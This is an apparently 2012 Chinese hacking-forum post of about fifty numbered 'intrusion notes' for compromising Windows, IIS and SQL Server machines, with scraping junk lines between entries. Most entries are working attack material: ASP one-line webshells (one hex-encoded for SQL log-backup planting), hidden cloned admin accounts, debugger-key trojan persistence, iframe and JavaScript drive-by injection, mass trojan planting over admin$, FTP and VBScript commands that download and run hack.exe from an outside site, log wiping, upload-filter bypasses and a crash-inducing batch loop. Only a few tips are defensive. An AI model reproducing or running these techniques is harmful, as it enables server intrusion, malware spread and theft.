中国网络渗透测试联盟
标题:
入侵渗透笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:13
标题:
入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
4 D0 D) |. t, E- x6 C# ]
cacls C:\windows\system32 /G hqw20:R
4 Q& K) r7 m- A5 ?- k4 q9 v% E
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 r; Q2 M5 c3 Z1 O! g9 U3 m9 a
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
% L5 T% p! Q/ V) x( F
4 r; c5 W. i: s' {& {+ l: C
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
( q! M* \2 e- K% k1 ^
4 M6 O' r( P! v" k
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
]6 k" q" j9 e( R. g& A- u
4 t5 Q6 t% V% s* d' \0 S7 V1 M0 j
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
- Y& S0 a: v) h9 |: T {: X
" @) h# }& @2 _
5、利用INF文件来修改注册表
* ]0 I9 [9 W9 A3 n. X% ?
[Version]
4 Y# w* x( n, M8 i) g5 `- F
Signature="$CHICAGO$"
5 Y0 d7 I! r, K$ d/ y5 a
[Defaultinstall]
+ |# n3 E' w* W7 c$ R" W# K; t7 X3 W
addREG=Ating
& f: @' F# z+ M6 n2 s3 q% t
[Ating]
) n% D0 ^7 ]# D+ z* F2 G
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
1 }- Y8 u. r, c( p: ^/ J7 [
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; I5 |. ~ `1 R$ _. c% S4 Y
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
# t0 v( H' j: I( u/ ?* I8 T
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
9 x$ @. _- d% N) E$ V
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
& z+ G7 t$ u. k5 o/ v+ w# Z
HKEY_CURRENT_CONFIG 简写为 HKCC
! b& d. }2 Y* U+ J
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
( W) R2 S) l0 s" Q% B
"1"这里代表是写入或删除注册表键值中的具体数据
$ V+ Q: n6 K9 ]" H a
3 P& J6 A6 b6 I( u. w
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
2 B$ p; n( o1 C. R2 [' u
多了一步就是在防火墙里添加个端口,然后导出其键值
+ G2 w1 _$ f# r) }1 Z( u) U
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
8 O& [8 s7 r- A+ F
" x+ j+ n- Z# t$ o
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
4 \( p- B6 E3 k% B; T0 g
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
) i4 v" Z, I3 {% E4 ]% a4 A' f0 O
% @/ N1 h* P; Q/ @. q9 J8 o3 {, J# a
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
/ O& J3 X1 Z* l7 U$ ]
/ H6 j" o4 i" L% n0 u) D1 x% j' p, Z; D
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
) f% Z4 p3 h4 q/ K
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ n9 O9 R+ ~+ M7 q2 n9 M
# A% |* k5 ~" k# \ O8 G
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
1 x) R% O7 e' a& O9 F' h
6 x9 G6 b) r& } P1 u: I9 H
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ D& Y; Q9 O6 k) k) ?
用法:xsniff –pass –hide –log pass.txt
7 M) ~* ?4 c& T; T8 z
* r5 }. k* q6 s0 J1 o
12、google搜索的艺术
2 e [6 n) J- B% @9 T
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ a8 n( ~8 e0 n: ?" J* R0 o4 I: j
或“字符串的语法错误”可以找到很多sql注入漏洞。
- f! m' U0 ?8 U# v
( \2 ?+ O8 u/ P5 \8 |5 u; I
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
& B& O" C7 u- V
_# Y" g5 N+ G+ [6 a2 d9 c
14、cmd中输入 nc –vv –l –p 1987
$ z: y% F8 }, G; n" G3 V
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- H7 V/ V$ d: ?' g- ]
1 E- L3 Z* m6 f& D% N, H8 U
15、制作T++木马,先写个ating.hta文件,内容为
3 F) b- I8 c6 c: G( ~& I
<script language="VBScript">
: ]7 g$ r) t5 N1 y5 B( \! ]
set wshshell=createobject ("wscript.shell" )
9 U8 _* V6 L; S+ r N6 ~
a=wshshell.run("你马的名称",1)
! U' y1 v% A4 _! G* m4 `
window.close
0 `2 \$ L/ n t h- g8 N
</script>
3 k; D3 }3 n( Z y+ P+ O
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
: F+ ?3 T: \" u0 ?5 I
1 Y& U1 Z3 @4 g# ?) g- T+ N& S$ D
16、搜索栏里输入
, K; l3 U( ?* `! D8 s
关键字%'and 1=1 and '%'='
5 F, o) c& i$ `; o& `/ C) X- L {
关键字%'and 1=2 and '%'='
: s1 y2 ]) S5 H( A
比较不同处 可以作为注入的特征字符
5 {0 t M+ \+ D; ~
( y4 Y Z: _ P6 S/ t! @1 I) }
17、挂马代码<html>
2 m" a; a; B4 u) P
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
7 M: M3 h/ r. D! c& k+ m( O
</html>
5 n) ^5 V" Y6 J
3 @* y& ^0 Q6 n1 H
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
& U- y8 W) T4 u H: a: i) A
net localgroup administrators还是可以看出Guest是管理员来。
- D3 F( s, l) N* Q
5 x8 C! T- m! q5 H; D% w h. H
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
. N4 R) f& [# |- L
用法: 安装: instsrv.exe 服务名称 路径
4 `& b) f* b$ G1 ~* q+ N
卸载: instsrv.exe 服务名称 REMOVE
, {* Y; A {1 m1 P9 A% @* g& f0 t! C
( f$ ]1 j/ p4 T9 g
6 M; O1 p! }; Q$ _0 H
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
7 x( t$ T- I3 s. ]) P
不能注入时要第一时间想到%5c暴库。
) ?, H( S0 c' G
- h6 V2 T1 z, V
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
3 k* L( v3 }8 M! R
' R& B0 g" G3 M
23、缺少xp_cmdshell时
% C) q/ U0 Q% A
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) M6 w0 H! N$ b# M1 l
假如恢复不成功,可以尝试直接加用户(针对开3389的)
}% D; q: q) w8 {6 T
declare @o int
1 M* Z- _1 o' g5 @6 { y: m. O+ d
exec sp_oacreate 'wscript.shell',@o out
# l( S) S: c+ s2 v- U. n! S( g
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
# K# |# k) h0 T# B0 `( _
8 U$ e2 k# y/ m! I* r
24.批量种植木马.bat
Z, H9 D/ w5 s: t
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 }* C1 `( ?2 {: w6 |0 W3 J& H
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
3 `5 `0 p8 I+ _& B- h8 n% t, F
扫描地址.txt里每个主机名一行 用\\开头
8 K- [6 |; v9 h" i& N
5 N A" G% W) x/ E8 ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
. m1 r+ o. p% H
9 ^2 R4 U* h0 B: T& s
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
# X# K% E6 {) f( H
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
2 w9 ^" |9 Q0 n. \/ L% u% _" w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 g' j* u3 ^* Q) u, l
0 w* z+ }3 U6 D8 R- E% t
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% S" L6 O3 y6 |/ i
然后用#clear logg和#clear line vty *删除日志
9 q( g' d2 ^3 n) F+ `' S
; P6 }; x4 _$ S2 x0 v
28、电脑坏了省去重新安装系统的方法
' ?& c+ U7 ]( n* ]0 @" z
纯dos下执行,
' N$ I q* Q9 @9 x( Y0 O' q5 R
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
3 t5 s V) ~9 L; I
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 i& W' T* i% B+ O9 {) y& C
. V5 A" k# e( Z7 a
29、解决TCP/IP筛选 在注册表里有三处,分别是:
: O/ G8 z$ K, D2 L" ^- ^$ }$ `
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
" E9 n. [! ~( i( B; Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 g/ Z7 \* U) g& W+ j6 o. e
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% y# P/ @/ w" I! Q6 d
分别用
5 J" @. T$ C" I) t
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( c% N" D1 |7 R6 T8 [. X" T
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" d: ^) Y2 q: P, p, P( n
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. ?3 P( H0 q g4 @: I& t
命令来导出注册表项
* p4 T& \ x1 P4 n3 Z+ a
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
! d* Y) }- x% T$ w! f$ B
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
; L% x0 G" K; s
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 w! J, s5 e: L' [7 m( l7 |
$ d3 O; f1 W! G0 j
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
" w0 F% Q5 m J
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
& N& [& L f8 D
, G: c5 k# u$ b
31、全手工打造开3389工具
! e1 R; ?' s' v' s7 N
打开记事本,编辑内容如下:
* A9 A0 x5 n( l* y2 P0 \+ S
echo [Components] > c:\sql
' c7 l6 L/ e' \* x( v6 E' `
echo TSEnable = on >> c:\sql
' u+ L( B g, ~' O Y
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
/ k5 l% A5 @9 M% t$ }! K* W
编辑好后存为BAT文件,上传至肉鸡,执行
; L5 @. ^+ C1 `( I- K8 e
- C$ X1 q; N$ T4 K+ [$ R: b' _
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
' ^2 m9 z- V6 g. ]$ w# Q
3 _/ y. a x% _- z; H# h
33、让服务器重启
3 _* ]; r P6 N W' f9 f2 h) G
写个bat死循环:
t! t3 r6 B1 W3 w* L
@echo off
) Q! G8 A9 D! t7 V* M2 o. S; \" w
:loop1
! ~' A, c* e6 ]9 x+ f5 X" ]0 |0 h
cls
- ?+ h6 G- K, [, l
start cmd.exe
) q2 y0 t) p( K- V! x) O
goto loop1
9 |# Y8 l* i4 E
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
% F' E* ~8 J; Y/ h) u6 w5 l' Y
' X K2 @, u! W& V s: s/ R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
$ z, X# {2 k2 O8 H# y# R: k7 |
@echo off
_' v+ Y( O8 r$ z3 B
date /t >c:/3389.txt
1 w! c5 W' g2 F* P
time /t >>c:/3389.txt
% b5 ~* q9 u- F' x. q; ?# Z& Q
attrib +s +h c:/3389.bat
# t W4 S" `0 I
attrib +s +h c:/3389.txt
( g9 X$ L8 ^, E. F6 S) T
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 [' ^7 N1 u; s& H* ^8 u
并保存为3389.bat
8 w' ]6 t" a7 h2 U4 y" ?
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) B* c7 e' H/ a1 c2 |
/ M3 f/ B1 F$ }' p' \
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
+ [' c B3 |6 s; [& K, S
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
$ V* |$ m. a$ T1 L
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
# K" s) {5 W' J( Y J2 d* i# G0 J
9 k. h4 ]+ D" q8 s& J
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
$ e! T! P' C: F' M, b; Z8 ~
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
+ Q; k& f3 X& s& {; s4 q4 o; p7 [
echo 你的FTP账号 >>c:\1.bat //输入账号
9 Z9 g2 }( q2 Q. q
echo 你的FTP密码 >>c:\1.bat //输入密码
" Q2 E$ l# G$ B) g6 R1 z
echo bin >>c:\1.bat //登入
5 v6 }3 @5 M& x: J: K, C
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
9 b7 D! x* l$ v a- c8 d; f
echo bye >>c:\1.bat //退出
# [7 n0 E) m6 a3 I7 Y( `
然后执行ftp -s:c:\1.bat即可
& e) c: l0 X8 x
/ f3 z8 Y' Y. ^! B7 i6 l2 s) G" v
37、修改注册表开3389两法
" W9 j7 S8 A6 I; S* B! m1 [
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ I$ t7 @# s, @1 O2 t
echo Windows Registry Editor Version 5.00 >>3389.reg
$ b8 A# C( a9 Q7 ]0 ?/ g
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
% ~1 [/ y3 E! r" `& S) Y* _
echo "Enabled"="0" >>3389.reg
, W9 ]2 @. E4 v7 t( k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
/ _ O( ?$ {& d* x* o
NT\CurrentVersion\Winlogon] >>3389.reg
( u' g {5 b7 X- T9 ]* \
echo "ShutdownWithoutLogon"="0" >>3389.reg
% D( u# F2 X! V6 H/ m9 i$ p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
0 U5 I3 b& N P6 I/ c
>>3389.reg
]) J" I7 t# E8 @ |4 h
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
6 _8 m" K+ Q# J; {3 i% c7 z0 s+ z/ ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
5 n' [0 s4 @7 ]6 Z9 T `: o
>>3389.reg
& |) \, J$ X/ B; A. m) @
echo "TSEnabled"=dword:00000001 >>3389.reg
1 z7 z8 ~& c$ \ q- {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
: C9 N$ C5 x& F7 V
echo "Start"=dword:00000002 >>3389.reg
5 _4 L5 u! J$ B+ }2 X+ t% c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
6 g/ G) i+ X: v6 u) x
>>3389.reg
* O- E4 r0 h4 D1 p3 X, S# S% G |
echo "Start"=dword:00000002 >>3389.reg
3 o6 u! O I& B& u2 r; D
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
" k6 C% J( m5 ~# L
echo "Hotkey"="1" >>3389.reg
6 z# K+ |- ?2 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: b( T& c: V* I5 P' E
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
- h9 ^' E" R' s( c) u( O9 i' \
echo "PortNumber"=dword:00000D3D >>3389.reg
& F7 D* j) u: t) a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 ~. O+ c; M$ e K5 X. Z9 r. _
Server\WinStations\RDP-Tcp] >>3389.reg
5 J3 c! F/ Z; C
echo "PortNumber"=dword:00000D3D >>3389.reg
! [* [ b; r3 H- N1 G4 ]! O
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
5 ?! ^* z+ f/ B
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
; d0 @ `; [4 m& m" L% Y: h4 e
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
7 f/ y# r9 V. Y
(2)winxp和win2003终端开启
! a# n" k2 M0 w$ s" R5 j
用以下ECHO代码写一个REG文件:
/ H8 N6 K I+ D$ H
echo Windows Registry Editor Version 5.00>>3389.reg
& { e f& U; e! C. J) H' b: V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ H( N1 V. ]* W2 g+ C
Server]>>3389.reg
0 v! C8 s: Q1 h9 c. f6 g) i! m
echo "fDenyTSConnections"=dword:00000000>>3389.reg
7 y9 a+ `- J9 h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( k6 Y6 J; n3 \. m! ^
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
( y+ p, q: X9 s
echo "PortNumber"=dword:00000d3d>>3389.reg
* d" @6 W% l y# o7 O% }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; E8 e' w1 }' o- o0 Z: r/ q6 t7 ` F
Server\WinStations\RDP-Tcp]>>3389.reg
. r6 j0 s$ l# n$ o6 `3 R4 M
echo "PortNumber"=dword:00000d3d>>3389.reg
. {; X' q: f3 h
然后regedit /s 3389.reg del 3389.reg
$ c5 z! O" [$ V* N8 z/ q% e, N
XP下不论开终端还是改终端端口都不需重启
$ C. [+ U$ i# U w1 o% B
5 t. r q) c! C+ C4 W P
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
3 Z- H, L! w' C# e& m$ V
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ p4 w% s5 \9 W7 J# u& Z+ c
. q+ e" I2 A+ D5 U6 [
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
& B; U/ w; ~# k3 n5 U/ C
(1)数据库文件名应复杂并要有特殊字符
; [4 p' Q6 {2 J; t2 A+ Y
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
8 M1 W% ~! p( z5 @
将conn.asp文档中的
" |' T* r( i; g: u$ H9 x
DBPath = Server.MapPath("数据库.mdb")
1 v$ H9 r' ^5 P* z
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
! l! N5 Z v1 V( {
; p1 |) }9 x* G) g$ Y
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
: t7 i3 J3 J9 c
(3)不放在WEB目录里
% T! t" Z' H3 D0 y t m
! w% m" h9 V/ H; p) |7 N& U
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 l$ Y I* j% Q) x2 [) y
可以写两个bat文件
% M1 j% B6 l; D9 I z# Q
@echo off
! S+ q6 C4 r- y' } {1 B0 K( `
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! Q9 L% S% a* I m! @9 D& t/ b# h
@del c:\winnt\system32\query.exe
) n6 v0 }9 [* ]2 u7 g0 A" V7 M- z
@del %SYSTEMROOT%\system32\dllcache\query.exe
) T4 ~5 o. f# `/ P
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
4 s4 _% d: S: i' W9 ]" _1 @/ d9 P
' T( }) l* l+ I1 `, l0 j
@echo off
: |. S' ~- ?; X
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
( Z4 u: S/ \* f! e
@del c:\winnt\system32\tsadmin.exe
0 d1 U# y* U8 g" n2 ~' ?1 I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 k e* _+ F/ {3 D& ?8 p
& r6 o3 V0 A! w, j" G& _
41、映射对方盘符
' B6 p" i. d1 X- N2 t, a
telnet到他的机器上,
( C; ?4 S! t- q: e5 ?* q7 k
net share 查看有没有默认共享 如果没有,那么就接着运行
* L! F. @: x) o& Q0 G
net share c$=c:
; K8 b8 p) L. c) y/ v5 ~
net share现在有c$
' g+ r8 `" _! A. M
在自己的机器上运行
3 Q3 L- n# H* G9 _5 D
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
2 `0 t. ?; B/ H8 u
, N' X6 F9 E4 T: v" a2 ?
42、一些很有用的老知识
4 Z6 U; p) O7 l/ q
type c:\boot.ini ( 查看系统版本 )
3 a5 g* }$ A% k# Y4 j
net start (查看已经启动的服务)
9 R; |# x* `! }* I- _- ^ {% }& O3 R
query user ( 查看当前终端连接 )
: }8 J$ D2 n1 ~- q& {9 f6 w
net user ( 查看当前用户 )
( } D9 h$ d+ f$ M9 |! x C4 x' ?
net user 用户 密码/add ( 建立账号 )
) e$ Q& R9 v$ J' d( Q8 r
net localgroup administrators 用户 /add (提升某用户为管理员)
X: T" h, U9 A" l) k
ipconfig -all ( 查看IP什么的 )
0 X0 e* q5 @6 b5 ? D0 `/ p+ m
netstat -an ( 查看当前网络状态 )
- M/ w! h. r1 u$ q, p7 Q7 z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
2 T2 n9 }7 l- p( o5 G' `& |0 z( g
克隆时Administrator对应1F4
, C3 H+ R9 q2 @( F- K
guest对应1F5
% j0 r- |+ ?8 V0 K& }# [8 B
tsinternetuser对应3E8
) K9 M* m1 B! k0 H5 J2 P
+ ^. G' N4 ]. N* R. |4 K
43、如果对方没开3389,但是装了Remote Administrator Service
" f8 [3 D V0 d: o e) ?
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
0 h1 z b: j w* z- {
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
$ O* Z& s% I5 l( ^) X: e: _
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 Y" N& ~! ^' R9 I
# ]- {3 K2 q: v& m' R* L
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
1 X" S4 Y0 [2 ]$ {% [6 h' E
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
2 X& S( n8 }7 H6 @' N; s& ^
( ~9 X0 i, I1 P' u4 I
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& u- W1 }6 d- W% T: s& z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
" i- J4 v% J: h
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
l0 x, R1 x3 y8 Z
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
" i! V4 n+ d& n
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
1 _% s1 ?- M1 B$ o
(这是完整的一句话,其中没有换行符)
5 i% s: r# T! {( W, }9 t
然后下载:
0 B3 H5 `/ g9 n. X( f
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
% \$ d. k7 {# B, X2 S! Z% i. Y
i, {# F* S4 m" K; P
46、一句话木马成功依赖于两个条件:
5 N. i& o1 s$ S
1、服务端没有禁止adodb.Stream或FSO组件
' H6 V' z( I c, _; g3 [+ i8 E
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
, _1 Z, J4 U; o4 U' l% y% }" _, U
/ M( C/ r1 p+ }% X5 ~4 g* P) t
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
; A6 a' I; g+ v/ K) P" k+ n
;alter database utsz set RECOVERY FULL--
' k7 i6 r5 n" X7 Y, P% n7 u
;create table cmd (a image)--
8 z+ l4 P( ]- Y S. m9 |
;backup log utsz to disk = 'D:\cmd' with init--
/ f: [0 m2 a& S$ o
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
+ i% o d, M/ b1 F9 d! ]
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
) I3 O/ E6 x+ s! x9 w
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 T$ e5 S/ m* O% d# J- D
! b) O a- ~# a% ]
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
( l/ ~. g8 @7 ~* q7 E
% M c0 ~6 B: N9 d& A
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
M0 L# W6 q% } P8 M, d
所有会话用 'all'。
4 @. f# f; q3 ~) P" c7 E
-s sessionid 列出会话的信息。
. G3 \( a" j/ S
-k sessionid 终止会话。
9 W. H0 S# y. a! e6 r. j
-m sessionid 发送消息到会话。
5 n4 p# x" F% j4 S
1 _' u- r* Z, s6 ~4 |; v
config 配置 telnet 服务器参数。
) ^ b7 g! c! u; g* h A
* i8 r( A& y# q4 s8 J
common_options 为:
" P. Y5 y `5 U7 u
-u user 指定要使用其凭据的用户
" Z D6 h% ]+ \. E5 L
-p password 用户密码
# X2 l4 P; w L, h/ ?
$ I# m) ?4 {! |( [( o
config_options 为:
3 _/ e$ l5 G3 [' k
dom = domain 设定用户的默认域
7 }2 B6 ~9 K4 ^' Y
ctrlakeymap = yes|no 设定 ALT 键的映射
Y6 P, M% c4 b( x0 L* W% |! Q
timeout = hh:mm:ss 设定空闲会话超时值
t/ V% r0 m3 M. U. T) g7 r
timeoutactive = yes|no 启用空闲会话。
, S& @5 Y$ I+ `! b, A& L5 ~. G
maxfail = attempts 设定断开前失败的登录企图数。
! n7 I/ m0 Z# Y2 x( U @4 P
maxconn = connections 设定最大连接数。
5 a$ ^2 w X$ J* r
port = number 设定 telnet 端口。
* B) D% v' H$ d' L
sec = [+/-]NTLM [+/-]passwd
0 m- Q& L" a8 ~2 Z- U
设定身份验证机构
1 Y# ?. m( h% D3 c
fname = file 指定审计文件名。
7 W0 x9 I* j W- Z5 B1 E0 y
fsize = size 指定审计文件的最大尺寸(MB)。
7 w6 z" j/ F& i9 `% k# x% r
mode = console|stream 指定操作模式。
" K( `1 |4 L9 G! v( Q' N+ p
auditlocation = eventlog|file|both
; n/ |# b: [2 ^6 d6 _
指定记录地点
: `+ r1 v5 R- O# ?# ~' i
audit = [+/-]user [+/-]fail [+/-]admin
8 ]4 Q/ Y5 E! s0 _ l# W
% k: U! w: ?4 W+ h
49、例如:在IE上访问:
5 s+ y( F; B; m i% [/ ]4 P
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
" x0 S: {+ t+ F, e9 Y; |7 j/ d% L) q
hack.txt里面的代码是:
* ^7 J/ f. b; d8 B1 @5 \6 c" A
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
5 i+ D, x0 x, p% J3 n
把这个hack.txt发到你空间就可以了!
4 A" `7 u0 Q* ^% k
这个可以利用来做网马哦!
' s) m0 {: G. J2 C: i* x- Y( Q
( A2 l4 {* m, t
50、autorun的病毒可以通过手动限制!
1 R4 y( [# J5 d r. h
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
: I% g1 ]# T1 f3 S9 N$ ?
2,打开盘符用右键打开!切忌双击盘符~
( E2 o1 N- H6 H. w1 p/ S1 @
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
9 b4 ~- [; g) @0 c( |
% f/ F. p8 E+ t- K
51、log备份时的一句话木马:
) v: t* I9 Z9 D3 {* j4 q) g! E+ @
a).<%%25Execute(request("go"))%%25>
